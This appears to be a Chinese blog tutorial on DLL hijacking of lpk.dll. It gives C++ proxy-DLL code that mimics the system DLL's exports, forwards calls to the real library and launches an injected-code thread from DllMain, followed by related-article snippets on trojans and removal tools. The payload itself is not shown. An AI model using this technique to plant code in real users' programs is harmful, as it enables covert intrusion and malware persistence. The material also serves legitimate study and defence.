DLL劫持技术详解(lpk.dll)

最新推荐文章于 2020-12-09 21:31:40 发布
最新推荐文章于 2020-12-09 21:31:40 发布
阅读量477 收藏
点赞数
分类专栏: 注入-标准
我们要模拟写一个LPK.DLL,它与系统目录下的LPK.DLL导出表相同,并能加载系统目录下的LPK.DLL,并且能将导出表转发到真实的LPK.DLL

1、构造一个与系统目录下LPK.DLL一样的导出表
2、加载系统目录下的LPK.DLL
3、将导出函数转发到系统目录下的LPK.DLL上
4、在初始化函数中加入我们要执行的代码

首先是定义导出函数

[cpp] view plain copy
  1. #pragma comment(linker, "/EXPORT:LpkInitialize=_AheadLib_LpkInitialize,@1")  
  2. #pragma comment(linker, "/EXPORT:LpkTabbedTextOut=_AheadLib_LpkTabbedTextOut,@2")  
  3. #pragma comment(linker, "/EXPORT:LpkDllInitialize=_AheadLib_LpkDllInitialize,@3")  
  4. #pragma comment(linker, "/EXPORT:LpkDrawTextEx=_AheadLib_LpkDrawTextEx,@4")  
  5. //#pragma comment(linker, "/EXPORT:LpkEditControl=_AheadLib_LpkEditControl,@5")  
  6. #pragma comment(linker, "/EXPORT:LpkExtTextOut=_AheadLib_LpkExtTextOut,@6")  
  7. #pragma comment(linker, "/EXPORT:LpkGetCharacterPlacement=_AheadLib_LpkGetCharacterPlacement,@7")  
  8. #pragma comment(linker, "/EXPORT:LpkGetTextExtentExPoint=_AheadLib_LpkGetTextExtentExPoint,@8")  
  9. #pragma comment(linker, "/EXPORT:LpkPSMTextOut=_AheadLib_LpkPSMTextOut,@9")  
  10. #pragma comment(linker, "/EXPORT:LpkUseGDIWidthCache=_AheadLib_LpkUseGDIWidthCache,@10")  
  11. #pragma comment(linker, "/EXPORT:ftsWordBreak=_AheadLib_ftsWordBreak,@11")  
LPK.DLL比较特殊,在导入表中有一项不是函数是数据,因此数据这部分要单独处理。核心代码如下:

[cpp] view plain copy
  1. EXTERNC void __cdecl AheadLib_LpkEditControl(void);     
  2. EXTERNC __declspec(dllexportvoid (*LpkEditControl[14])() = {AheadLib_LpkEditControl};     
LpkEditControl这个数组有14个成员,如上定义即可,后面我们还需要将真正的数据复制过来。
1.加载系统目录下的LPK.DLL。关键: 使用LoadLibrary方式加载系统目录下的LPK.DLL。加载完成后就要实现导出函数的转发了

[cpp] view plain copy
  1. inline BOOL WINAPI Load()  
  2.     {  
  3.         TCHAR tzPath[MAX_PATH];  
  4.         TCHAR tzTemp[MAX_PATH * 2];  
  5.           
  6.         GetSystemDirectory(tzPath, MAX_PATH);  
  7.         lstrcat(tzPath, TEXT("\\lpk"));  
  8.         m_hModule=LoadLibrary(tzPath);  
  9.         if (m_hModule == NULL)  
  10.         {  
  11.             wsprintf(tzTemp, TEXT("无法加载 %s,程序无法正常运行。"), tzPath);  
  12.             MessageBox(NULL, tzTemp, TEXT("AheadLib"), MB_ICONSTOP);  
  13.         };  
  14.           
  15.         return (m_hModule != NULL);   
  16.     }  
2. 获得原函数地址

[cpp] view plain copy
  1. FARPROC WINAPI GetAddress(PCSTR pszProcName)  
  2.     {  
  3.         FARPROC fpAddress;  
  4.         CHAR szProcName[16];  
  5.         TCHAR tzTemp[MAX_PATH];  
  6.           
  7.         fpAddress = GetProcAddress(m_hModule, pszProcName);  
  8.         if (fpAddress == NULL)  
  9.         {  
  10.             if (HIWORD(pszProcName) == 0)  
  11.             {  
  12.                 wsprintf(szProcName, "%d", pszProcName);  
  13.                 pszProcName = szProcName;  
  14.             }  
  15.               
  16.             wsprintf(tzTemp, TEXT("无法找到函数 %hs,程序无法正常运行。"), pszProcName);  
  17.             MessageBox(NULL, tzTemp, TEXT("AheadLib"), MB_ICONSTOP);  
  18.             ExitProcess(-2);  
  19.         }  
  20.         return fpAddress;  
  21.     }  
3. 将我们构造的导出函数转发

[cpp] view plain copy
  1. // 导出函数  
  2. ALCDECL AheadLib_LpkInitialize(void)  
  3. {  
  4.     GetAddress("LpkInitialize");  
  5.     __asm JMP EAX;  
  6. }  
  7. ALCDECL AheadLib_LpkGetTextExtentExPoint(void)  
  8. {  
  9.     GetAddress("LpkGetTextExtentExPoint");  
  10.     __asm JMP EAX;  
  11. }  
  12. .......................................太长了,请直接看源码附件  
4.在DLL初始化函数中加载我们要注入远程进程的代码:

[cpp] view plain copy
  1. BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)  
  2. {  
  3.     if (dwReason == DLL_PROCESS_ATTACH)  
  4.     {  
  5.         DisableThreadLibraryCalls(hModule);  
  6.         if(Load())  
  7.         {  
  8.             //LpkEditControl这个数组有14个成员,必须将其复制过来      
  9.             memcpy((LPVOID)(LpkEditControl+1), (LPVOID)((int*)GetAddress("LpkEditControl") + 1),52);     
  10.             _beginthread(Init,NULL,NULL);  
  11.         }  
  12.         else  
  13.             return FALSE;  
  14.     }  
  15.     else if (dwReason == DLL_PROCESS_DETACH)  
  16.     {  
  17.         Free();  
  18.     }  
  19.     return TRUE;  
  20. }  
5.测试,在Init中加入测试代码,把lpk复制到待测试软件同目录下,比如我们的记事本,notepad


源码下载
blsm0930
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Win7下实现 lpk.dll劫持游戏注入
南的专栏
07-22 6734
由于输入表中只包含DLL名而没有它的路径名,因此加载程序必须在磁盘上搜索DLL文件。首先会尝试从当前程序所在的目录加载DLL,如果没找到,则在Windows系统目录中查找,最后是在环境变量中列出的各个目录下查找。利用这个特点,先伪造一个系统同名的DLL,提供同样的输出表,每个输出函数转向真正的系统DLL。程序调用系统DLL时会先调用当前目录下伪造的DLL,完成相关功能后,再跳到系统DLL同名函数里
AheadLib.rar
05-26
AheadLib.rar
python dll注入监听_注入方式,劫持dll注入的实现
weixin_39814393的博客
12-09 730
基础的东西不想多讲,简单的提一句,具体请问度娘。Windows的PE加载器会从执行文件目录下寻找DLL,如果找不到再去其他地方找。把我们特定的DLL伪装成系统DLL,然后放在执行文件目录下,就能实现DLL劫持劫持来干嘛?肯定是要在被干程序体内有一席之地,然后想干什么就干什么。比如劫持ws2_32.dll可以实现抓包,改包,转向等。如何伪造?当然是伪造导出表啦,导出表是一个DLL最总要的部分。L...
lpk.rar_lpk_lpk. dll_lpk.dll
09-20
标题 "lpk.rar_lpk_lpk.dll_lpk.dll" 暗示了这是一个与 `lpk.dll` 文件相关的压缩包,包含了一些可能用于理解和修改 `lpk.dll` 功能的文件。`lpk.dll` 是 Microsoft Windows 操作系统中的一个库文件,全称是 ...
LPK.DLL--USP10.DLL-DELETE.rar_lpk_lpk.dll_usp10.dll
09-14
标题 "LPK.DLL--USP10.DLL-DELETE.rar_lpk_lpk.dll_usp10.dll" 和描述 "Virus Kill USP10.DLL LPK.DLL" 提到的是与Windows操作系统中两个重要的动态链接库(DLL)文件相关的主题。LPK.DLL 和 USP10.DLL 文件在系统中...
lpk.dll专杀工具RavRbot和lpkKiller
05-11
lpkKiller是巨盾出品的...RavRbot是一款针对Backdoor.Win32.Rbot后门病毒的专用清除工具,而该病毒可以在有可执行文件的目录下生成LPK.DLL文件,当运行改文件的时间便会激活,导致不能彻底清除,而本工具便能很好的解决
lpk.dll killer专杀工具(不删除压缩文件仅删DLL).zip
04-02
标题中的“lpk.dll killer专杀工具(不删除压缩文件仅删DLL)”是指一个专门设计用来清除与“lpk.dll”相关的恶意软件或病毒的工具。在Windows操作系统中,lpk.dll是一个合法的系统文件,但有时会被病毒或恶意软件...
lpk.rar_lpk_lpk 源码_lpk.dll_lpk/download_lpk源码
09-20
【标题】"lpk.rar_lpk_lpk 源码_lpk.dll_lpk/download_lpk源码" 提供的是一个关于C语言编程的资源包,其中包含了一个名为`lpk.dll`的动态链接库(Dynamic Link Library)的源代码。这个`lpk.dll`可能是一个用于特定...
AheadLib-x86-x64:hijack dll源代码生成器。 支持x86x64
05-25
AheadLib-x86-x64 hijack dll Source Code Generator. support x86/x64 snapshot screen 不支持导出符号带有??的方法! NOTE Pay attention to the generated file header prompt information
AheadLib_lucky_789修改版
07-03
导出函数表
反编译DLL文件为.CPP工具
12-19
一、简介   AheadLib 是用来生成一个特洛伊DLL的工具,用于分析DLL中的函数参数调用(比如记录Socket send了什么等等)、更改函数功能(随心所欲了:)、更改界面功能(比如在Hook里面生成一个按钮,截获事件等等)。 二、使用   1.用 AheadLib 打开要模拟的 DLL,生成一个 CPP 文件。   2.用 Visual Studio 6.0/.NET 建立一个 DLL 工程,把这个 CPP 文件加入到项目中。   3.使用 Release 方式编译,生成的 DLL 将和原来的 DLL 具有一模一样的导出函数,并且能顺利把这些函数转发到原来的函数中。   4.AheadLib 还可以生成 Hook 代码,用于截取当前进程的所有消息,这样就可以随心所欲地处理各种消息了 (修改第三方程序界面功能的好助手)。 三、备注   1.如果导出函数过多,在 Visual Studio 6.0 中,如果出现编译错误,请在项目属性关闭与编译头功能。   2.如果是 C++ 、C __stdcall、C __fastcall 的方式导出的话,生成的函数声明将会还原成原代码级别(可能需要修改才能编译,比如导出C++类的情况)。此时使用 __declspec(dllexport) 导出 ——不能指定导出序号。   3.如果是 NONAME 或者 C _CDECL 方式导出(比如 DEF 导出,大多数Windows DLL都是这种情况,比如WS2_32等等),则使用#pragma comment(linker, "/EXPORT:...)导出,且指定导出序号。   4.如果系统中没有 DbgHelp.dll,将无法识别 C++ 模式的导出。
AheadLib 源代码
03-22
AheadLib 源代码,分析DLL的必备工具,也可用于劫持生成。
Winmm劫持源码, 支持X64
03-08
Winmm劫持源码, 支持64位 APIHook
基于AheadLib工具进行DLL劫持
LYSM
06-24 2835
背景 或许你听过DLL劫持技术,获取你还没有尝试过DLL劫持技术DLL劫持技术的原理是: 由于输入表中只包含DLL名而没有它的路径名,因此加载程序必须在磁盘上搜索DLL文件。首先会尝试从当前程序所在的目录加载DLL,如果没找到,则在Windows系统目录中查找,最后是在环境变量中列出的各个目录下查找。利用这个特点,先伪造一个系统同名的DLL,提供同样的输出表,每个输出函数转向真正的系统DLL。程序调用系统DLL时会先调用当前目录下伪造的DLL,完成相关功能后,再跳到系统DLL同名函数里执行。这个过程用个形
转帖:DLL劫持技术详解(lpk.dll)
weixin_30617561的博客
04-04 306
说起DLL劫持技术,相信大家都不会陌生,因为这种技术的应用比较广泛,比如木马后门的启动、破解程序的内存补丁、外挂插件的注入以及加密狗的模拟等。之所以DLL劫持技术深受黑客们的喜爱,主要是因为该技术可以有效的躲过大部分杀软,并且实现起来技术难度不大。DLL劫持技术也不是什么新技术,记得在《Windows核心编程》中也有提及相关技术。可是对我们广大初学者来说,DLL劫持技术就显得很神秘了,本系列教程将...
Ring3下Dll注入方法整理汇总
liujiayu2的专栏
06-30 1618
1.dll劫持,粗略整理了下,可以劫持dll有(持续更新): lpk.dll、usp10.dll、msimg32.dll、midimap.dll、ksuser.dll、comres.dll、ddraw.dlllpk为例,在win7下由于lpk被加入KnownDLLs且该注册表值不可修改,使得lpk强制从系统目录加载, 不过可以将lpk.dll加入ExcludeFromKnownDlls
用AheadLib进行简单的DLL注入
I have a dream
10-26 5695
参考链接:http://www.voidcn.com/article/p-hwvwbvwu-xz.html 1、首先编写要注入的DLL文件:dllTest_dll.dll 只进行两个数的简单相加 #include "dllTest_dll.h" int add(int x,int y) { return x+y; } DLL的头文件dllT
lpk.dll 这个是木马吗?
最新发布
06-01
lpk.dll 本身不是木马,它是 Windows 操作系统的一个系统文件,主要用于支持多语言界面。然而,一些恶意软件可能会模仿系统文件的名称,将其作为木马的隐藏文件名,以此来逃避杀毒软件的检测和清除。如果您的计算机...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值